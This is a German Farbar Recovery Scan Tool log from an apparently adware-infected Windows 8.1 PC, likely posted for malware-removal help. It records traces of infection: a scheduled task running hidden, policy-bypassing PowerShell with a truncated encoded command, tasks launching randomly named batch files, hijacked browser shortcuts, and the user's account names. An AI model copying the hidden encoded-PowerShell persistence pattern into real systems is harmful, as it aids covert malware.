C:\Users\Denny\AppData\Local\Temp\5620.tmp.exe
C:\Users\Denny\AppData\Local\Temp\5621.tmp.exe
C:\Users\Denny\AppData\Local\Temp\9F4F.tmp.exe
C:\Users\Denny\AppData\Local\Temp\9F64.tmp.exe
C:\Users\Denny\AppData\Local\Temp\9F8D.tmp.exe
C:\Users\Denny\AppData\Local\Temp\9F8E.tmp.exe
C:\Users\Denny\AppData\Local\Temp\A170.tmp.exe
C:\Users\Denny\AppData\Local\Temp\avgnt.exe
C:\Users\Denny\AppData\Local\Temp\F64A.tmp.exe
C:\Users\Denny\AppData\Local\Temp\F6BE.tmp.exe
C:\Users\Denny\AppData\Local\Temp\F707.tmp.exe
C:\Users\Denny\AppData\Local\Temp\F708.tmp.exe
C:\Users\Denny\AppData\Local\Temp\F79B.tmp.exe
C:\Users\Denny\AppData\Local\Temp\F844.tmp.exe
C:\Users\Denny\AppData\Local\Temp\sqlite3.dll
==================== Bamital & volsnap =================
(Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.)
C:\WINDOWS\system32\winlogon.exe => Datei ist digital signiert
C:\WINDOWS\system32\wininit.exe => Datei ist digital signiert
C:\WINDOWS\explorer.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\explorer.exe => Datei ist digital signiert
C:\WINDOWS\system32\svchost.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\svchost.exe => Datei ist digital signiert
C:\WINDOWS\system32\services.exe => Datei ist digital signiert
C:\WINDOWS\system32\User32.dll => Datei ist digital signiert
C:\WINDOWS\SysWOW64\User32.dll => Datei ist digital signiert
C:\WINDOWS\system32\userinit.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\userinit.exe => Datei ist digital signiert
C:\WINDOWS\system32\rpcss.dll => Datei ist digital signiert
C:\WINDOWS\system32\dnsapi.dll => Datei ist digital signiert
C:\WINDOWS\SysWOW64\dnsapi.dll => Datei ist digital signiert
C:\WINDOWS\system32\Drivers\volsnap.sys => Datei ist digital signiert
LastRegBack: 2016-03-09 10:08
==================== Ende von FRST.txt ============================
Code:
ATTFilter Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version:05-03-2016 01
durchgeführt von Denny (2016-03-29 13:02:36)
Gestartet von C:\Users\Denny\Desktop
Windows 8.1 (X64) (2013-10-24 10:59:13)
Start-Modus: Normal
==========================================================
==================== Konten: =============================
Administrator (S-1-5-21-1569062512-718196537-2772323438-500 - Administrator - Enabled) => C:\Users\Administrator.Schneider
Denny (S-1-5-21-1569062512-718196537-2772323438-1001 - Administrator - Enabled) => C:\Users\Denny
Gast (S-1-5-21-1569062512-718196537-2772323438-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-1569062512-718196537-2772323438-1005 - Limited - Enabled)
==================== Sicherheits-Center ========================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)
AV: Avira Antivirus (Enabled - Up to date) {4D041356-F94D-285F-8768-AAE50FA36859}
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Avira Antivirus (Enabled - Up to date) {F665F2B2-DF77-27D1-BDD8-9197742422E4}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
==================== Installierte Programme ======================
(Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)
Acer Docs (HKLM-x32\...\{CA4FE8B0-298C-4E5D-A486-F33B126D6A0A}) (Version: 1.03.3000 - Acer Incorporated)
Acer Docs Office AddIn (HKLM-x32\...\{DCBF3379-246B-47E1-8173-639B63940838}) (Version: 2.04.2005 - Acer)
Acer Launch Manager (HKLM\...\{C18D55BD-1EC6-466D-B763-8EEDDDA9100E}) (Version: 8.00.3003 - Acer Incorporated)
Acer Media (HKLM-x32\...\{E9AF1707-3F3A-49E2-8345-4F2D629D0876}) (Version: 2.04.3002.6 - Acer Incorporated)
Acer Photo (HKLM-x32\...\{B5AD89F2-03D3-4206-8487-018298007DD0}) (Version: 2.04.3003.1 - Acer Incorporated)
Acer Portal (HKLM-x32\...\{A5AD0B17-F34D-49BE-A157-C8B3D52ACD13}) (Version: 2.04.3004 - Acer Incorporated)
Acer Power Management (HKLM\...\{91F52DE4-B789-42B0-9311-A349F10E5479}) (Version: 7.00.3012 - Acer Incorporated)
Acer Recovery Management (HKLM\...\{07F2005A-8CAC-4A4B-83A2-DA98A722CA61}) (Version: 6.00.3016 - Acer Incorporated)
Acer Remote Files (HKLM\...\{13885028-098C-4799-9B71-27DAC96502D5}) (Version: 1.02.3001 - Acer Incorporated)
Acer USB Charge Manager (HKLM\...\{07E867C5-0C48-40FF-A013-DDAF4565AD47}) (Version: 2.00.3004 - Acer Incorporated)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 4.0.0.1390 - Adobe Systems Incorporated)
Adobe Creative Cloud (HKLM-x32\...\Adobe Creative Cloud) (Version: 2.7.0.413 - Adobe Systems Incorporated)
Adobe Download Assistant (HKLM-x32\...\com.adobe.downloadassistant.AdobeDownloadAssistant) (Version: 1.2.6 - Adobe Systems Incorporated)
Adobe Flash Player 18 PPAPI (HKLM-x32\...\Adobe Flash Player PPAPI) (Version: 18.0.0.209 - Adobe Systems Incorporated)
Adobe Photoshop Elements 13 (HKLM-x32\...\{609818B9-23EB-4196-B466-EFE05E92A32F}) (Version: 13.0 - Adobe Systems Incorporated)
Amazon 1Button App (x32 Version: 1.0.6 - Amazon) Hidden
Avira Antivirus (HKLM-x32\...\Avira Antivirus) (Version: 15.0.16.282 - Avira Operations GmbH & Co. KG)
clear.fi SDK - Video 2 (x32 Version: 2.2.2722 - CyberLink Corp.) Hidden
clear.fi SDK- Movie 2 (x32 Version: 2.2.2729 - CyberLink Corp.) Hidden
CyberLink MediaEspresso 6.5 (HKLM-x32\...\InstallShield_{E3739848-5329-48E3-8D28-5BBD6E8BE384}) (Version: 6.5.3729_45993 - CyberLink Corp.)
Dolby Home Theater v4 (HKLM-x32\...\{B26438B4-BF51-49C3-9567-7F14A5E40CB9}) (Version: 7.2.8000.17 - Dolby Laboratories Inc)
Epson Customer Research Participation (HKLM\...\{B26449A6-6007-4460-B4FE-C4776115BCEA}) (Version: 1.61.0000 - EPSON)
EPSON Scan (HKLM-x32\...\EPSON Scanner) (Version: - Seiko Epson Corporation)
EPSON XP-700 Series Printer Uninstall (HKLM\...\EPSON XP-700 Series) (Version: - SEIKO EPSON Corporation)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 35.0.1916.153 - Google Inc.)
HID Monitor (HKLM-x32\...\{31923C55-8208-4D0A-8AD6-3AE099A1A741}) (Version: 1.1.5 - Acer Incorporated)
Identity Card (HKLM-x32\...\{3D9CB654-99AD-4301-89C6-0D12A790767C}) (Version: 2.00.3006 - Acer Incorporated)
Intel(R) Management Engine Components (HKLM-x32\...\{65153EA5-8B6E-43B6-857B-C6E4FC25798A}) (Version: 8.1.0.1281 - Intel Corporation)
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.10.3958 - Intel Corporation)
Intel(R) SDK for OpenCL - CPU Only Runtime Package (HKLM-x32\...\{FCB3772C-B7D0-4933-B1A9-3707EBACC573}) (Version: 2.0.0.37149 - Intel Corporation)
Java 8 Update 25 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218025F0}) (Version: 8.0.250 - Oracle Corporation)
Live Updater (HKLM-x32\...\{EE26E302-876A-48D9-9058-3129E5B99999}) (Version: 2.00.3010 - Acer Incorporated)
Microsoft Office Professional Plus 2010 (HKLM-x32\...\Office14.PROPLUS) (Version: 14.0.4763.1000 - Microsoft Corporation)
Microsoft Silverlight (HKLM-x32\...\{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}) (Version: 5.1.30514.0 - Microsoft Corporation)
Microsoft SkyDrive (HKU\S-1-5-21-1569062512-718196537-2772323438-1001\...\SkyDriveSetup.exe) (Version: 16.4.6013.0910 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Mozilla Firefox 45.0.1 (x86 de) (HKLM-x32\...\Mozilla Firefox 45.0.1 (x86 de)) (Version: 45.0.1 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 45.0.1 - Mozilla)
Nero BackItUp 12 Essentials OEM.a01 (HKLM-x32\...\{4CA8F973-6377-4ABF-9ED5-CC2323B3C000}) (Version: 12.5.00500 - Nero AG)
Nero MediaHome Free (HKLM-x32\...\{6CC8CA12-AD2B-4C07-B2C4-B32CDBF5F29D}) (Version: 15.0.01800 - Nero AG)
Nikon Message Center 2 (HKLM-x32\...\{B014EE44-9197-4513-9613-71E6EB1B514E}) (Version: 2.0.1 - Nikon)
Picture Control Utility (HKLM-x32\...\{87441A59-5E64-4096-A170-14EFE67200C3}) (Version: 1.2.2 - Nikon)
Prerequisite installer (x32 Version: 12.0.0003 - Nero AG) Hidden
Prerequisite installer (x32 Version: 15.0.0005 - Nero AG) Hidden
Qualcomm Atheros Bluetooth Suite (64) (HKLM\...\{A84A4FB1-D703-48DB-89E0-68B6499D2801}) (Version: 8.0.0.222 - Qualcomm Atheros Communications)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 8.14.327.2013 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.6870 - Realtek Semiconductor Corp.)
Realtek PCIE Card Reader (HKLM-x32\...\{C9661090-C134-46E8-90B2-76D72355C2A6}) (Version: 6.2.9200.21222 - Realtek Semiconductor Corp.)
Samsung Link 1.8.0.1403131552 (HKLM\...\8474-7877-9059-0204) (Version: 1.8.0.1403131552 - Copyright 2013 SAMSUNG)
SAMSUNG USB Driver for Mobile Phones (HKLM\...\{D0795B21-0CDA-4a92-AB9E-6E92D8111E44}) (Version: 1.5.33.0 - SAMSUNG Electronics Co., Ltd.)
Shared C Run-time for x64 (HKLM\...\{EF79C448-6946-4D71-8134-03407888C054}) (Version: 10.0.0 - McAfee)
Software Updater (HKLM-x32\...\{B307472F-7BD9-4040-9255-CE6D6A1196A3}) (Version: 4.3.1 - SEIKO EPSON CORPORATION)
SonyEditor (remove only) (HKLM-x32\...\SonyEditor) (Version: - )
Visual Studio 2005 Tools for Office Second Edition Runtime (HKLM-x32\...\Microsoft Visual Studio 2005 Tools for Office Runtime) (Version: - Microsoft Corporation)
Visual Studio Tools for the Office system 3.0 Runtime (HKLM-x32\...\Visual Studio Tools for the Office system 3.0 Runtime) (Version: - Microsoft Corporation)
Visual Studio Tools for the Office system 3.0 Runtime Service Pack 1 (KB949258) (HKLM-x32\...\{8FB53850-246A-3507-8ADE-0060093FFEA6}.KB949258) (Version: 1 - Microsoft Corporation)
==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ==========================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
CustomCLSID: HKU\S-1-5-21-1569062512-718196537-2772323438-1001_Classes\CLSID\{820D63D5-8CFF-46DE-86AF-4997DEDD6DB5}\localserver32 -> C:\WINDOWS\system32\igfxEM.exe (Intel Corporation)
==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) =============
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
Task: {1297570B-38F1-49A5-A941-B11ED2E003D4} - System32\Tasks\Adobe Flash Player Updater => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2016-02-05] (Adobe Systems Incorporated)
Task: {13B8CF77-9E85-407D-A789-112A0DDF8A7F} - System32\Tasks\Foxvohji => C:\PROGRA~1\SHOPPE~3\Madre.bat
Task: {221D435A-EA55-420E-8423-8ED93C16F2BD} - System32\Tasks\{862ADFBD-2F9C-1196-63CC-68B979092056} => powershell.exe -windowstyle hidden -noninteractive -ExecutionPolicy bypass -EncodedCommand IAAgADsAOwAgACAAIAA7ACAAIAA7ACAAIAA7ADsAOwAgADsAIAAgACAAOwAgACAAOwA7ADsAOwA7ACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAPQAiAHMAdABvAHAAIgA7ACQAcwBjAD0AIgBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACIAOwAkAFcA (Der Dateneintrag hat 8096 mehr Zeichen).
Task: {45E15A8F-D60A-4899-94EE-F2D2FFC44C1D} - System32\Tasks\{55AB0601-0B56-F46D-28BD-EBA44DF6A920} => C:\WINDOWS\system32\regsvr32.exe [2014-10-29] (Microsoft Corporation)
Task: {582339AA-55CB-446D-9C0A-E237D27C9460} - System32\Tasks\DeviceDetector => C:\Program Files (x86)\CyberLink\MediaEspresso\DeviceDetector\DeviceDetector.exe [2013-02-08] (CyberLink)
Task: {6631CA39-E6CA-443E-A7B3-C72F37978029} - System32\Tasks\{12146BCF-AB85-4EF1-B4A9-E5E62ADD7B59} => pcalua.exe -a "C:\Program Files (x86)\GUPlayer\Uninstaller.exe" -d "C:\Program Files (x86)\GUPlayer"
Task: {691F8DB4-04E1-4275-8E3C-4A02A8A0BF55} - System32\Tasks\Microsoft\Windows\RemovalTools\MRT_HB => C:\WINDOWS\system32\MRT.exe [2016-03-22] (Microsoft Corporation)
Task: {6D2FBF57-89ED-48A5-B2E0-752E571395C4} - System32\Tasks\{07238A32-598B-4B2D-8035-1479B16A3DB0} => pcalua.exe -a C:\Users\Denny\AppData\Roaming\yoursearching\UninstallManager.exe -c -ptid=face
Task: {767E686C-0DA9-4ED3-9F7E-C07DBE050AF0} - System32\Tasks\Siaby => C:\PROGRA~1\SHOPPE~1\Imuarb.bat
Task: {9DD2C156-62AC-406B-9385-CADD795FD545} - System32\Tasks\Conbyg => C:\PROGRA~1\SHOPPE~1\Jyjdhb.bat
Task: {9FCAB4F1-032C-4A7C-964D-D7642FE7C9C7} - System32\Tasks\Fimgumbo => C:\PROGRA~1\GROOVE~1\Itiulgac.bat
Task: {A641688E-E37E-40B4-9239-4268905DD07C} - System32\Tasks\Vuaga => C:\PROGRA~1\SHOPPE~1\Atoqbiuz.bat
Task: {BE213BAE-DF95-400C-ADD4-F489EA0AEC83} - System32\Tasks\Sitnis => C:\PROGRA~1\SHOPPE~2\Qapwifa.bat
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)
Task: C:\WINDOWS\Tasks\Adobe Flash Player Updater.job => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
==================== Verknüpfungen =============================
(Die Einträge können gelistet werden, um sie zurückzusetzen oder zu entfernen.)
ShortcutWithArgument: C:\Users\Denny\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www%2dmysearch.com/?prd=set_epc&s=G37zftptn095001,36925718-a198-4f72-92af-e9bcc635037f,
ShortcutWithArgument: C:\Users\Denny\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet-Explorer Browser.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www%2dmysearch.com/?prd=set_epc&s=G37zftptn095001,36925718-a198-4f72-92af-e9bcc635037f,
ShortcutWithArgument: C:\Users\Denny\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www%2dmysearch.com/?prd=set_epc&s=G37zftptn095001,36925718-a198-4f72-92af-e9bcc635037f,
==================== Geladene Module (Nicht auf der Ausnahmeliste) ==============
2013-10-31 18:49 - 2014-03-13 16:52 - 00013824 _____ () C:\Program Files\Samsung\Samsung Link\JniSys.dll
2016-03-21 22:40 - 2016-03-21 22:40 - 00515584 _____ () C:\Windows\Temp\sqlite-3.7.2-sqlitejdbc.dll
2013-10-31 18:49 - 2014-03-13 16:52 - 02149376 _____ () C:\Program Files\Samsung\Samsung Link\scone_proxy.dll
2013-10-31 18:49 - 2014-03-13 16:52 - 01630720 _____ () C:\Program Files\Samsung\Samsung Link\scone_stub.dll
2013-06-29 02:51 - 2013-02-20 22:58 - 00111176 _____ () C:\Program Files (x86)\Acer\clear.fi plug-in\Clearfishellext_x64.dll
2010-01-30 02:40 - 2010-01-30 02:40 - 04254560 _____ () C:\Program Files\Common Files\microsoft shared\OFFICE14\Cultures\OFFICE.ODF
2013-06-29 02:11 - 2013-02-18 07:38 - 01198912 _____ () C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\ACE.dll
==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) =========
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird nur der ADS entfernt.)
==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ===================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Der Wert "AlternateShell" wird wiederhergestellt.)
==================== EXE Verknüpfungen (Nicht auf der Ausnahmeliste) ===============
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt.)
==================== Internet Explorer Vertrauenswürdig/Eingeschränkt ===============
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.)
==================== Hosts Inhalt: ===============================
(Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.)
2013-08-22 15:25 - 2013-08-22 15:25 - 00000824 ____A C:\WINDOWS\system32\Drivers\etc\hosts
==================== Andere Bereiche ============================
(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)
HKU\S-1-5-21-1569062512-718196537-2772323438-1001\Control Panel\Desktop\\Wallpaper -> C:\Windows\Web\Wallpaper\acer01.jpg
DNS Servers: 192.168.1.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall ist aktiviert.
==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge ==
(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)
HKLM\...\StartupApproved\Run: => "ETDCtrl"
HKLM\...\StartupApproved\Run: => "Samsung Link"
HKLM\...\StartupApproved\Run: => "3D BubbleSound"
HKLM\...\StartupApproved\Run: => "SpaceSoundPro"
HKLM\...\StartupApproved\Run32: => "Adobe Creative Cloud"
HKLM\...\StartupApproved\Run32: => "Nikon Message Center 2"
HKLM\...\StartupApproved\Run32: => "QuickTime Task"
HKLM\...\StartupApproved\Run32: => "Registry Helper"
HKLM\...\StartupApproved\Run32: => "fst_de_19"
HKLM\...\StartupApproved\Run32: => "t4pc_en_3"
HKLM\...\StartupApproved\Run32: => "SunJavaUpdateSched"
HKLM\...\StartupApproved\Run32: => "gmsd_de_005010126"
HKLM\...\StartupApproved\Run32: => "YTDownloader"
HKLM\...\StartupApproved\Run32: => " QQPCTray"
HKU\S-1-5-21-1569062512-718196537-2772323438-1001\...\StartupApproved\StartupFolder: => "OneNote 2010 Bildschirmausschnitt- und Startprogramm.lnk"
HKU\S-1-5-21-1569062512-718196537-2772323438-1001\...\StartupApproved\StartupFolder: => "hqghumeaylnlf.lnk"
HKU\S-1-5-21-1569062512-718196537-2772323438-1001\...\StartupApproved\Run: => "CAHeadless"
HKU\S-1-5-21-1569062512-718196537-2772323438-1001\...\StartupApproved\Run: => "Web Companion"
==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ===============
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
FirewallRules: [{290FEF21-DC28-4CDB-84A3-0CF48C59C53F}] => (Allow) C:\Program Files\Common Files\mcafee\platform\mcsvchost\McSvHost.exe
FirewallRules: [{53F21F5D-793A-40CD-BE18-64DC327CAC74}] => (Allow) C:\Program Files\Common Files\mcafee\platform\mcsvchost\McSvHost.exe
FirewallRules: [{9366E490-4066-453E-A63E-30D38D3C4385}] => (Allow) C:\Program Files (x86)\Acer\clear.fi SDK21\Video\VideoPlayer.exe
FirewallRules: [{957FF23A-1843-4C65-BBCF-377F30A37421}] => (Allow) C:\Program Files (x86)\Spotify\Data\SpotifyWebHelper.exe
FirewallRules: [{9FC26195-3C09-4CCF-91F4-496AAC3E0579}] => (Allow) C:\Program Files (x86)\Spotify\Data\SpotifyWebHelper.exe
FirewallRules: [{6F98C6CA-669A-49BB-A000-DCBC70357288}] => (Allow) C:\Program Files (x86)\Spotify\spotify.exe
FirewallRules: [{2E6F58D2-F1DA-40A7-B824-7BFBEC8C62F3}] => (Allow) C:\Program Files (x86)\Spotify\spotify.exe
FirewallRules: [{B82CCA82-236A-4606-B2A1-6683CE2BB5E1}] => (Allow) C:\Program Files (x86)\Nero\Nero 12\Nero BackItUp\BackItUp.exe
FirewallRules: [{710D6FB0-C282-43DE-94B6-5DA25FA840BA}] => (Allow) C:\Program Files (x86)\Nero\Nero 12\Nero BackItUp\BackItUp.exe
FirewallRules: [{9532778B-533D-41E9-B1C9-7856FDB5133B}] => (Allow) LPort=8743
FirewallRules: [{4D6AF942-EAF0-47BB-B0F4-0359D6091F30}] => (Allow) LPort=8643
FirewallRules: [{9B59EAE9-A372-4F68-B16F-2ECAA3EA515A}] => (Allow) LPort=7676
FirewallRules: [{A4EA84FD-B131-452D-A687-2FC8D2EB78C3}] => (Allow) LPort=7679
FirewallRules: [{15BEFA30-7102-42C0-961B-A344E9E0251A}] => (Allow) LPort=24234
FirewallRules: [{BD3B9774-3F44-4838-8A8F-6414A358A460}] => (Allow) LPort=7900
FirewallRules: [{B428C9A2-4E8F-439D-A91F-894BF3994FC5}] => (Allow) LPort=1900
FirewallRules: [{B0B96A98-BB54-4416-95EF-A4FFA1D3E92A}] => (Allow) C:\Program Files\Samsung\Samsung Link\Samsung Link Tray Agent.exe
FirewallRules: [{22649299-4229-4001-9C23-2C8EF0D021C6}] => (Allow) C:\Program Files\Samsung\Samsung Link\Samsung Link Tray Agent.exe
FirewallRules: [{75C220A7-7912-4649-96E4-1C6D42C27C3F}] => (Allow) C:\Program Files\Samsung\Samsung Link\Samsung Link.exe
FirewallRules: [{A945E41D-11DC-484D-A439-8F75665FF810}] => (Allow) C:\Program Files\Samsung\Samsung Link\Samsung Link.exe
FirewallRules: [{118DE993-AB64-4609-8043-8989F6E196A0}] => (Allow) C:\Program Files\Samsung\AllShare Framework DMS\1.3.21\AllShareFrameworkDMS.exe
FirewallRules: [{297E9E38-6323-4850-8793-890A4E1205BB}] => (Allow) C:\Program Files\Samsung\AllShare Framework DMS\1.3.21\AllShareFrameworkDMS.exe
FirewallRules: [{1BA61F3A-7C93-4D2E-B332-92CF5BE489EC}] => (Allow) C:\Program Files (x86)\Acer\Acer Portal\ccd.exe
FirewallRules: [{DC615730-96FE-44BE-9092-C23B56CDB009}] => (Allow) C:\Program Files (x86)\Acer\Acer Portal\ccd.exe
FirewallRules: [{5F0C690B-51F3-4FFA-8EEE-C5829966CB9B}] => (Allow) C:\Program Files (x86)\Acer\Acer Portal\Sdd.exe
FirewallRules: [{6F77C27B-B0FA-4B07-B15E-9913C71FC2BB}] => (Allow) C:\Program Files (x86)\Acer\Acer Portal\Sdd.exe
FirewallRules: [{EFBAC9EC-6AAB-4AE6-88EE-873AD8ABC7E1}] => (Allow) C:\Program Files (x86)\Acer\Acer Portal\virtualdrive.exe
FirewallRules: [{0D61EDDD-3DAD-4D0E-85F1-F7152ED3BEC4}] => (Allow) C:\Program Files (x86)\Acer\Acer Portal\virtualdrive.exe
FirewallRules: [{55C9BFD4-E19A-4C09-A550-EA815A77F875}] => (Allow) C:\Program Files (x86)\Acer\Acer Portal\ccd.exe
FirewallRules: [{368618D4-80BD-47EC-B00A-554CCFD16ECC}] => (Allow) C:\Program Files (x86)\Acer\Acer Portal\ccd.exe
FirewallRules: [{D5705000-430A-4DE7-B504-F3176E52BD62}] => (Allow) C:\Program Files (x86)\Acer\Acer Photo\DMCDaemon.exe
FirewallRules: [{10AAFB71-519E-4031-9E51-E38B666F3808}] => (Allow) C:\Program Files (x86)\Acer\Acer Photo\DMCDaemon.exe
FirewallRules: [{147C84EE-5F68-49BF-A093-CEBEEBD1F845}] => (Allow) C:\Program Files (x86)\Acer\Acer Photo\WindowsUpnp.exe
FirewallRules: [{57FBBC48-338F-4339-B94A-B6F949FAE9E4}] => (Allow) C:\Program Files (x86)\Acer\Acer Photo\WindowsUpnp.exe
FirewallRules: [{484626A6-A444-4833-BEAF-C493E3DB322D}] => (Allow) C:\Program Files (x86)\Acer\Acer Media\DMCDaemon.exe
FirewallRules: [{80B4DFDA-F518-4EE4-A150-A2CD466AD4BD}] => (Allow) C:\Program Files (x86)\Acer\Acer Media\DMCDaemon.exe
FirewallRules: [{479688D5-1CD3-4C96-8C3F-98DAA8676511}] => (Allow) C:\Program Files (x86)\Acer\Acer Media\WindowsUpnpMV.exe
FirewallRules: [{684F9EC8-CE62-45CF-8C0A-E600CB6770E5}] => (Allow) C:\Program Files (x86)\Acer\Acer Media\WindowsUpnpMV.exe
FirewallRules: [{2932FB41-9623-445B-B74C-AB39C41E41D8}] => (Allow) C:\Program Files\Samsung\Samsung Link\Samsung Link.exe
FirewallRules: [{FA7AD37A-61AE-4AC5-90E8-0ACB0E02C82A}] => (Allow) C:\Program Files\Samsung\Samsung Link\Samsung Link.exe
FirewallRules: [{B8380D2E-28B4-4239-B1FC-E21AD7DB6507}] => (Allow) C:\Program Files\Samsung\Samsung Link\Samsung Link Tray Agent.exe
FirewallRules: [{0144819F-7C36-4E95-8468-A54663C763D8}] => (Allow) C:\Program Files\Samsung\Samsung Link\Samsung Link Tray Agent.exe
FirewallRules: [{682BEC69-6576-4675-9D34-3195707A8D30}] => (Allow) C:\Program Files\Samsung\Samsung Link\Samsung Link Tray Agent.exe
FirewallRules: [{A5EA98FB-B16F-4B86-B9F3-3F7B725FEA14}] => (Allow) C:\Program Files\Samsung\Samsung Link\Samsung Link.exe
FirewallRules: [{C2F25F89-9DFD-4DEF-B157-4A68AA57BEF1}] => (Allow) C:\Program Files\Samsung\Samsung Link\Samsung Link Tray Agent.exe
FirewallRules: [{40733857-3854-4F7D-ABAD-8839839E1CA3}] => (Allow) C:\Program Files\Samsung\Samsung Link\Samsung Link.exe
FirewallRules: [{1AF1DCBF-BCE3-4798-B587-7124462DB377}] => (Allow) C:\Program Files\Samsung\Samsung Link\Samsung Link.exe
FirewallRules: [{AA88FEE8-E662-4ADE-9A23-27CD92A2A4C3}] => (Allow) C:\Program Files\Samsung\Samsung Link\Samsung Link Tray Agent.exe
FirewallRules: [{217A8D6B-829D-4AE5-B0F9-93F9AD735CC2}] => (Allow) C:\Program Files\Samsung\Samsung Link\Samsung Link Tray Agent.exe
FirewallRules: [{0F2CD704-F53C-42B9-8565-E6AF5F373409}] => (Allow) C:\Program Files\Samsung\Samsung Link\Samsung Link.exe
FirewallRules: [{60A20179-977C-4925-BD45-186CC74D8B19}] => (Allow) C:\Windows\SysWOW64\muzapp.exe
FirewallRules: [{00ADB8FE-4D9E-4B3D-B9AB-6474FEB64908}] => (Allow) C:\Windows\SysWOW64\muzapp.exe
FirewallRules: [{01BD45EA-2486-4F1B-B219-B768D7AC80D4}] => (Allow) C:\Program Files (x86)\Nero\Nero Blu-ray Player\Blu-rayPlayer.exe
FirewallRules: [{DA460DCD-D762-4AA5-81BD-338370077CB1}] => (Allow) C:\Program Files (x86)\Nero\Nero Blu-ray Player\Blu-rayPlayer.exe
FirewallRules: [{95170546-A139-4F6A-B54E-110BAA90A507}] => (Allow) C:\Program Files (x86)\Nero\KM\NMDllHost.exe
FirewallRules: [{72068411-0556-4539-BC7C-535A80472C40}] => (Allow) C:\Program Files (x86)\Nero\KM\NMDllHost.exe
FirewallRules: [{C2658416-A2DF-4190-A1C5-4CFAAC757C0E}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{8588E4BB-3623-4737-ABB4-DEE15F85D85B}] => (Allow) C:\Users\Denny\AppData\Local\Chromium\Application\chrome.exe
==================== Wiederherstellungspunkte =========================
22-03-2016 02:55:07 JRT Pre-Junkware Removal
29-03-2016 12:45:27 Windows Modules Installer
==================== Fehlerhafte Geräte im Gerätemanager =============
==================== Fehlereinträge in der Ereignisanzeige: =========================
Applikationsfehler:
==================
Error: (03/29/2016 12:51:11 PM) (Source: Microsoft-Windows-AppModel-State) (EventID: 10) (User: SCHNEIDER)
Description: microsoft.windowscommunicationsapps_8wekyb3d8bbwe2
